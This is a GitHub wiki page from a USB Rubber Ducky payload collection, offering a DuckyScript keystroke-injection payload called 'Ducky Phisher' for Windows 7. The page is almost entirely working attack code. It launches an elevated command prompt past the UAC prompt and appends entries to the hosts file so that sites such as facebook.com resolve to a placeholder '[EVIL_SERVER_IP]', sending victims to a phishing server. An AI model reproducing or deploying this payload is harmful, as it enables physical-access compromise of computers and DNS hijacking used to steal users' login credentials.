Payload ducky phisher - a3rd/USB-Rubber-Ducky GitHub Wiki

Ducky Phisher

Author: Koryusai-Kun (Mad props to darren’s UAC bypass code) Duckencoder: 1.2 Target: Windows 7 Description: Used for phishing websites, read the REM in the code.

REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
REM Description: so when the user types into there web browser for example www.facebook.com it
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
ENTER
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

Payload ducky phisher - a3rd/USB-Rubber-Ducky GitHub Wiki

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️